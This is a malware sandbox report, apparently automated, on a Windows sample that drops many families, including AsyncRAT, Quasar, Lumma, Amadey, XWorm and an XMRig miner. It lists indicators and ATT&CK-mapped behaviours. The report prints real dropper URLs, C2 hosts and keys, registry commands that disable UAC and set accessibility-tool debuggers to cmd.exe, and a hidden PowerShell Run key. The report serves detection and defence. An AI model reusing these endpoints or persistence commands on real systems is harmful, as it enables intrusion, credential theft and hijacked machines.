amadey | 5f16ff577993765462d5b054e943ed28bf5dbddb869ca48b22e5643c1a32e6c9

Analysis

max time kernel
150s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
28-11-2024 19:56

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

take3.exe
Size

14.3MB
MD5

84c0ea78eb89b7abee5e03ae8ee708e4
SHA1

91339bd35bd8f01868b8ff39d57b2f07fb050a0b
SHA256

9f9cfe42a0768cc02609fcabf58b8ccce826d5d768e8c6d3a6728f543c4eac53
SHA512

ca66588967874065481bbe80c262c55b3c831e3c95a1fb8830581765cc3dbeaa9d5608823aee899de316be9323a986e6866d399f9950af22e37efb527476436f
SSDEEP

393216:KOWd863huc1dQJlAwF3MnG3InVFedWm7NS/xHWgnHz:b893hr1dQ53MG4VAHsT

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://c3poolbat.oss-accelerate.aliyuncs.com/c3pool/WinRing0x64.sys

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://c3poolbat.oss-accelerate.aliyuncs.com/c3pool/config.json

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://c3poolbat.oss-accelerate.aliyuncs.com/c3pool/xmrig.exe

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://c3poolbat.oss-accelerate.aliyuncs.com/c3pool/nssm.exe

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://176.113.115.178/FF/2.png

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://176.113.115.178/FF/3.png

Extracted

Family

asyncrat

Version

0.5.8

Botnet

Default

ser.nrovn.xyz:6606

ser.nrovn.xyz:7707

ser.nrovn.xyz:8808

Mutex

nfMlxLKxWkbD

Attributes

delay
3
install
true
install_file
http.exe
install_folder
%AppData%

aes.plain

Extracted

Family

lumma

https://preside-comforter.sbs

https://savvy-steereo.sbs

https://copper-replace.sbs

https://record-envyp.sbs

https://slam-whipp.sbs

https://wrench-creter.sbs

https://looky-marked.sbs

https://plastic-mitten.sbs

https://tail-cease.cyou

Extracted

Family

quasar

Version

1.4.1

Botnet

SGVP

192.168.1.9:4782

150.129.206.176:4782

Ai-Sgvp-33452.portmap.host:33452

Mutex

a35ec7b7-5a95-4207-8f25-7af0a7847fa5

Attributes

encryption_key
09BBDA8FF0524296F02F8F81158F33C0AA74D487
install_name
User Application Data.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Windowns Client Startup
subdirectory
Quasar

Extracted

Family

metasploit

Version

encoder/shikata_ga_nai

Extracted

Family

metasploit

Version

metasploit_stager

144.34.162.13:3333

Extracted

Family

amadey

Version

5.10

Botnet

e43a13

http://154.216.20.237

Attributes

install_dir
9f16311490
install_file
Gxtuum.exe
strings_key
a7aaea3610a351d7a88f318681678260
url_paths
/Gd84kkjf/index.php

rc4.plain

Extracted

Family

quasar

Version

1.4.1

Botnet

Office04

14.243.221.170:2654

Mutex

a7b38fdd-192e-4e47-b9ba-ca9eb81cc7bd

Attributes

encryption_key
8B9AD736E943A06EAF1321AD479071E83805704C
install_name
Runtime Broker.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Runtime Broker
subdirectory
SubDir

Extracted

Family

metasploit

Version

windows/reverse_tcp

64.176.38.237:8139

Extracted

Family

xworm

Version

5.0

154.197.69.165:7000

panpoppo-25611.portmap.io:25611

Mutex

wPxAiY3vITAPeZGc

Attributes

Install_directory
%AppData%
install_file
System.exe

aes.plain

Extracted

Family

xred

xred.mooo.com

Attributes

email
[email protected]
payload_url
http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978

https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download

https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1

http://xred.site50.net/syn/SUpdate.ini

https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download

https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1

http://xred.site50.net/syn/Synaptics.rar

https://docs.google.com/uc?id=0BxsMXGfPIZfSTmlVYkxhSDg5TzQ&export=download

https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1

http://xred.site50.net/syn/SSLLibrary.dll

Extracted

Family

lumma

https://tail-cease.cyou/api

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Amadey family
amadey
Ammyy Admin
Remote admin tool with various capabilities.
rat ammyyadmin

AmmyyAdmin payload 1 IoCs

Processes:

resource	yara_rule
behavioral2/files/0x000c000000022f3f-1975.dat	family_ammyyadmin

Ammyyadmin family
ammyyadmin
AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat

Detect Xworm Payload 5 IoCs

Processes:

resource	yara_rule
behavioral2/files/0x0002000000022f5b-2061.dat	family_xworm
behavioral2/files/0x0002000000022fa0-2073.dat	family_xworm
behavioral2/memory/3844-2194-0x0000000000B80000-0x0000000000B90000-memory.dmp	family_xworm
behavioral2/files/0x0007000000023d0b-2755.dat	family_xworm
behavioral2/memory/7172-2761-0x0000000000A40000-0x0000000000A52000-memory.dmp	family_xworm

FlawedAmmyy RAT
Remote-access trojan based on leaked code for the Ammyy remote admin software.
trojan flawedammyy
Flawedammyy family
flawedammyy
Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
Lumma family
lumma
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Metasploit family
metasploit
Njrat family
njrat
Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 5 IoCs

Processes:

resource	yara_rule
behavioral2/files/0x0007000000023cde-286.dat	family_quasar
behavioral2/memory/392-294-0x00000000008B0000-0x0000000000BD4000-memory.dmp	family_quasar
behavioral2/files/0x0007000000023cdf-1144.dat	family_quasar
behavioral2/memory/6324-1151-0x00000000002F0000-0x0000000000614000-memory.dmp	family_quasar
behavioral2/memory/5488-2592-0x0000000004140000-0x0000000004DC9000-memory.dmp	family_quasar

UAC bypass 3 TTPs 7 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exe

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	reg.exe

Xmrig family
xmrig
Xred
Xred is backdoor written in Delphi.
backdoor xred
Xred family
xred
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm
njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Async RAT payload 1 IoCs

rat

Processes:

resource	yara_rule
behavioral2/files/0x0007000000023cf6-186.dat	family_asyncrat

Enumerates VirtualBox registry keys 2 TTPs 1 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

Processes:

random.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSF	random.exe

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 3 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

Processes:

random.exedef.exenbea1t8.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	random.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	def.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	nbea1t8.exe

XMRig Miner payload 1 IoCs

miner

Processes:

resource	yara_rule
behavioral2/memory/5028-1081-0x0000000180000000-0x0000000180820000-memory.dmp	xmrig

Blocklisted process makes network request 2 IoCs

Processes:

powershell.exepowershell.exe

flow	pid	Process
395	5492	powershell.exe
482	5416	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 26 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	Process
8236	powershell.exe
5360	powershell.exe
6224	powershell.exe
6052	powershell.exe
5932	powershell.exe
7176	powershell.exe
7816	powershell.exe
5620	powershell.exe
8512	powershell.exe
3944	powershell.exe
5892	powershell.exe
7464	powershell.exe
7664	powershell.exe
5524	powershell.exe
7512	powershell.exe
7708	powershell.exe
4776	powershell.exe
8556	powershell.exe
8776	powershell.exe
8988	powershell.exe
6940	powershell.exe
836	powershell.exe
7928	powershell.exe
1540	powershell.exe
5492	powershell.exe
5416	powershell.exe

Download via BitsAdmin 1 TTPs 2 IoCs

dropper

BITS Jobs

T1197

Processes:

bitsadmin.exebitsadmin.exe

pid	Process
4580	bitsadmin.exe
4576	bitsadmin.exe

Downloads MZ/PE file

Event Triggered Execution: Image File Execution Options Injection 1 TTPs 10 IoCs

persistence

Image File Execution Options Injection

T1546.012

Processes:

reg.exereg.exereg.exeGoogleUpdate.exereg.exe

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Magnify.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HelpPane.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HelpPane.exe\Debugger = "C:\\Windows\\system32\\cmd.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe\Debugger = "C:\\Windows\\system32\\cmd.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GoogleUpdate.exe	GoogleUpdate.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\cmd.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Magnify.exe\Debugger = "C:\\Windows\\system32\\cmd.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GoogleUpdate.exe\DisableExceptionChainValidation = "0"	GoogleUpdate.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe	reg.exe

Modifies Windows Firewall 2 TTPs 1 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

Processes:

netsh.exe

pid	Process
4456	netsh.exe

Sets file to hidden 1 TTPs 2 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1564.001

Processes:

attrib.exeattrib.exe

pid	Process
5236	attrib.exe
5312	attrib.exe

Uses browser remote debugging 2 TTPs 13 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

credential_access stealer

Steal Web Session Cookie

T1539

Modify Authentication Process

T1556

Processes:

chrome.exechrome.exechrome.exemsedge.exechrome.exechrome.exechrome.exechrome.exemsedge.exechrome.exechrome.exechrome.exechrome.exe

pid	Process
976	chrome.exe
2680	chrome.exe
5264	chrome.exe
4256	msedge.exe
4020	chrome.exe
7200	chrome.exe
5236	chrome.exe
932	chrome.exe
6980	msedge.exe
1556	chrome.exe
7208	chrome.exe
8196	chrome.exe
3760	chrome.exe

.NET Reactor proctector 2 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

Processes:

resource	yara_rule
behavioral2/files/0x0002000000022f62-1770.dat	net_reactor
behavioral2/memory/4748-1778-0x0000000000FB0000-0x0000000000FFE000-memory.dmp	net_reactor

Checks BIOS information in registry 2 TTPs 6 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

random.exedef.exenbea1t8.exe

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	random.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	random.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	def.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	def.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	nbea1t8.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	nbea1t8.exe

Checks computer location settings 2 TTPs 13 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

dsd.exemshta.exeAV_DOW~1.EXEt6kzDd6.exepornhub_downloader.exeGoogleUpdate.exeboot.exetake3.exeAllNew.exeav_downloader1.1.exemshta.exePORNHU~1.EXElangla.exe

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	dsd.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	AV_DOW~1.EXE
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	t6kzDd6.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	pornhub_downloader.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	GoogleUpdate.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	boot.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	take3.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	AllNew.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	av_downloader1.1.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	PORNHU~1.EXE
Key value queried	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation	langla.exe

Drops startup file 3 IoCs

Processes:

22.exetranslucently.exe

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\22.exe	22.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\translucently.vbs	translucently.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\22.exe	22.exe

Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
persistence privilege_escalation

Component Object Model Hijacking
T1546.015

Executes dropped EXE 55 IoCs

Processes:

dsd.exetvtC9D3.exeshttpsr_mg.exesvchost.exelangla.exeTPB-1.exeuxN4wDZ.exeuxN4wDZ.exe22.exehttp.exenbea1t8.exeSGVP%20Client%20Users.exeav_downloader1.1.exeAV_DOW~1.EXEt6kzDd6.exesvchost.exe1_encoded.exeGxtuum.exepornhub_downloader.exePORNHU~1.EXETaskmgr.exehack1226.exedmshell.exeRegistry.exeRuntime Broker.exeChromeSetup.exeGoogleUpdate.exeGoogleUpdate.exeGoogleUpdate.exeGoogleUpdateComRegisterShell64.exeGoogleUpdateComRegisterShell64.exewinbox.exeGoogleUpdateComRegisterShell64.exeGoogleUpdate.exeGoogleUpdate.exeGoogleUpdate.exeboot.exewget.exeSet_up.exeSharpHound.exeENP.exewget.exesvchost.exetest28.exerandom.exeaward.pdf.exeAllNew.exeGxtuum.exemsf.exesvchost.exeFACTURA09876567000.battranslucently.exewwbizsrvs.exedef.exeTORRENTOLD-1.exe

pid	Process
232	dsd.exe
5012	tvtC9D3.exe
1564	shttpsr_mg.exe
2368	svchost.exe
2120	langla.exe
1004	TPB-1.exe
2916	uxN4wDZ.exe
4928	uxN4wDZ.exe
5112	22.exe
2976	http.exe
1076	nbea1t8.exe
392	SGVP%20Client%20Users.exe
5680	av_downloader1.1.exe
5916	AV_DOW~1.EXE
5740	t6kzDd6.exe
3240	svchost.exe
6136	1_encoded.exe
1968	Gxtuum.exe
2936	pornhub_downloader.exe
336	PORNHU~1.EXE
5028	Taskmgr.exe
5808	hack1226.exe
5140	dmshell.exe
6324	Registry.exe
6544	Runtime Broker.exe
6620	ChromeSetup.exe
6920	GoogleUpdate.exe
6616	GoogleUpdate.exe
6728	GoogleUpdate.exe
6768	GoogleUpdateComRegisterShell64.exe
6872	GoogleUpdateComRegisterShell64.exe
6988	winbox.exe
6224	GoogleUpdateComRegisterShell64.exe
7004	GoogleUpdate.exe
7128	GoogleUpdate.exe
6164	GoogleUpdate.exe
6416	boot.exe
6876	wget.exe
5988	Set_up.exe
6552	SharpHound.exe
6072	ENP.exe
7100	wget.exe
3348	svchost.exe
6608	test28.exe
6904	random.exe
3284	award.pdf.exe
6896	AllNew.exe
5700	Gxtuum.exe
400	msf.exe
1496	svchost.exe
5968	FACTURA09876567000.bat
5716	translucently.exe
6588	wwbizsrvs.exe
4368	def.exe
5900	TORRENTOLD-1.exe

Identifies Wine through registry keys 2 TTPs 3 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

Processes:

nbea1t8.exerandom.exedef.exe

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Wine	nbea1t8.exe
Key opened	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Wine	random.exe
Key opened	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Wine	def.exe

Loads dropped DLL 43 IoCs

Processes:

take3.exetvtC9D3.exeGoogleUpdate.exeGoogleUpdate.exeGoogleUpdate.exeGoogleUpdateComRegisterShell64.exeGoogleUpdateComRegisterShell64.exeGoogleUpdateComRegisterShell64.exeGoogleUpdate.exeGoogleUpdate.exeGoogleUpdate.exe

pid	Process
3604	take3.exe
3604	take3.exe
3604	take3.exe
3604	take3.exe
3604	take3.exe
3604	take3.exe
3604	take3.exe
3604	take3.exe
3604	take3.exe
3604	take3.exe
3604	take3.exe
3604	take3.exe
3604	take3.exe
3604	take3.exe
3604	take3.exe
3604	take3.exe
3604	take3.exe
3604	take3.exe
3604	take3.exe
3604	take3.exe
3604	take3.exe
3604	take3.exe
3604	take3.exe
3604	take3.exe
3604	take3.exe
3604	take3.exe
5012	tvtC9D3.exe
5012	tvtC9D3.exe
5012	tvtC9D3.exe
6920	GoogleUpdate.exe
6616	GoogleUpdate.exe
6728	GoogleUpdate.exe
6768	GoogleUpdateComRegisterShell64.exe
6728	GoogleUpdate.exe
6872	GoogleUpdateComRegisterShell64.exe
6728	GoogleUpdate.exe
6224	GoogleUpdateComRegisterShell64.exe
6728	GoogleUpdate.exe
7004	GoogleUpdate.exe
7128	GoogleUpdate.exe
6164	GoogleUpdate.exe
6164	GoogleUpdate.exe
7128	GoogleUpdate.exe

Modifies file permissions 1 TTPs 2 IoCs

discovery

File and Directory Permissions Modification

T1222

Processes:

icacls.exeicacls.exe

pid	Process
8564	icacls.exe
8612	icacls.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001

VMProtect packed file 10 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

Processes:

resource	yara_rule
behavioral2/files/0x0007000000023d0b-900.dat	vmprotect
behavioral2/memory/3240-908-0x00007FF6A1D30000-0x00007FF6A1F6C000-memory.dmp	vmprotect
behavioral2/memory/3240-907-0x00007FF6A1D30000-0x00007FF6A1F6C000-memory.dmp	vmprotect
behavioral2/memory/3240-910-0x00007FF6A1D30000-0x00007FF6A1F6C000-memory.dmp	vmprotect
behavioral2/memory/3348-1534-0x00007FF605270000-0x00007FF6054AC000-memory.dmp	vmprotect
behavioral2/memory/3348-1537-0x00007FF605270000-0x00007FF6054AC000-memory.dmp	vmprotect
behavioral2/files/0x0007000000023d0b-1684.dat	vmprotect
behavioral2/memory/1496-1691-0x00007FF7F0A20000-0x00007FF7F0C57000-memory.dmp	vmprotect
behavioral2/memory/1496-1693-0x00007FF7F0A20000-0x00007FF7F0C57000-memory.dmp	vmprotect
behavioral2/memory/1496-1694-0x00007FF7F0A20000-0x00007FF7F0C57000-memory.dmp	vmprotect

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

nbea1t8.exe

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\Downloads\\UrlHausFiles\\nbea1t8.exe'\""	nbea1t8.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs

Web Service

T1102

Processes:

flow	ioc
1070	bitbucket.org
1106	bitbucket.org
18	raw.githubusercontent.com
90	raw.githubusercontent.com
91	raw.githubusercontent.com
92	raw.githubusercontent.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow	ioc
870	ip-api.com

AutoIT Executable 2 IoCs

AutoIT scripts compiled to PE executables.

Processes:

resource	yara_rule
behavioral2/memory/5968-1723-0x0000000000DB0000-0x0000000000EDE000-memory.dmp	autoit_exe
behavioral2/memory/5716-1750-0x0000000000290000-0x00000000003BE000-memory.dmp	autoit_exe

Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs

Processes:

nbea1t8.exerandom.exedef.exe

pid	Process
1076	nbea1t8.exe
6904	random.exe
4368	def.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

uxN4wDZ.exe

description	pid	Process	procid_target
PID 2916 set thread context of 4928	2916	uxN4wDZ.exe	113

UPX packed file 17 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral2/files/0x0007000000023ce2-160.dat	upx
behavioral2/memory/1564-165-0x0000000000400000-0x000000000047D000-memory.dmp	upx
behavioral2/memory/1564-228-0x0000000000400000-0x000000000047D000-memory.dmp	upx
behavioral2/files/0x0007000000023e8d-1383.dat	upx
behavioral2/memory/6988-1387-0x0000000000400000-0x0000000000422000-memory.dmp	upx
behavioral2/memory/6988-1540-0x0000000000400000-0x0000000000422000-memory.dmp	upx
behavioral2/memory/5968-1704-0x0000000000DB0000-0x0000000000EDE000-memory.dmp	upx
behavioral2/files/0x0002000000022f60-1712.dat	upx
behavioral2/memory/5968-1723-0x0000000000DB0000-0x0000000000EDE000-memory.dmp	upx
behavioral2/memory/5716-1724-0x0000000000290000-0x00000000003BE000-memory.dmp	upx
behavioral2/memory/5716-1750-0x0000000000290000-0x00000000003BE000-memory.dmp	upx
behavioral2/files/0x0007000000023e55-1995.dat	upx
behavioral2/memory/4076-1999-0x0000000000260000-0x00000000007CB000-memory.dmp	upx
behavioral2/memory/4076-2361-0x0000000000260000-0x00000000007CB000-memory.dmp	upx
behavioral2/files/0x0018000000023b55-3127.dat	upx
behavioral2/files/0x0007000000023cfe-3238.dat	upx
behavioral2/files/0x0008000000023eb7-3714.dat	upx

Drops file in Program Files directory 64 IoCs

Processes:

ChromeSetup.exeGoogleUpdate.exe

description	ioc	Process
File created	C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleCrashHandler64.exe	ChromeSetup.exe
File created	C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdateres_fr.dll	ChromeSetup.exe
File created	C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdateres_ja.dll	ChromeSetup.exe
File created	C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_ar.dll	GoogleUpdate.exe
File created	C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_th.dll	GoogleUpdate.exe
File created	C:\Program Files (x86)\Google\Update\1.3.36.352\psuser.dll	GoogleUpdate.exe
File created	C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdateres_bn.dll	ChromeSetup.exe
File created	C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdateres_et.dll	ChromeSetup.exe
File created	C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdateres_vi.dll	ChromeSetup.exe
File created	C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_fil.dll	GoogleUpdate.exe
File created	C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_it.dll	GoogleUpdate.exe
File created	C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdateres_es-419.dll	ChromeSetup.exe
File created	C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_bg.dll	GoogleUpdate.exe
File created	C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_fr.dll	GoogleUpdate.exe
File created	C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_te.dll	GoogleUpdate.exe
File created	C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_bn.dll	GoogleUpdate.exe
File created	C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_ml.dll	GoogleUpdate.exe
File created	C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleCrashHandler.exe	GoogleUpdate.exe
File created	C:\Program Files (x86)\Google\Update\1.3.36.352\psuser_64.dll	GoogleUpdate.exe
File created	C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdateres_en.dll	ChromeSetup.exe
File created	C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdateres_en-GB.dll	ChromeSetup.exe
File created	C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdateres_ur.dll	ChromeSetup.exe
File created	C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdateSetup.exe	ChromeSetup.exe
File created	C:\Program Files (x86)\Google\Temp\GUM656D.tmp\psmachine_64.dll	ChromeSetup.exe
File opened for modification	C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdateSetup.exe	ChromeSetup.exe
File created	C:\Program Files (x86)\Google\Temp\GUM656D.tmp\GoogleUpdateOnDemand.exe	ChromeSetup.exe
File created	C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdateres_it.dll	ChromeSetup.exe
File created	C:\Program Files (x86)\Google\Temp\GUM656D.tmp\goopdateres_tr.dll	ChromeSetup.exe
File created	C:\Program Files (x86)\Google\Update\1.3.36.352\goopdateres_zh-TW.dll	GoogleUpdate.exe
File created	C:\Program Files (x86)\Google\Update\1.3.36.352\GoogleUpdateBroker.exe	GoogleUpdate.exe
File created	C:\Program Files (x86)\Google\Temp\GUM656D.tmp\psuser.dll	ChromeSetup.exe
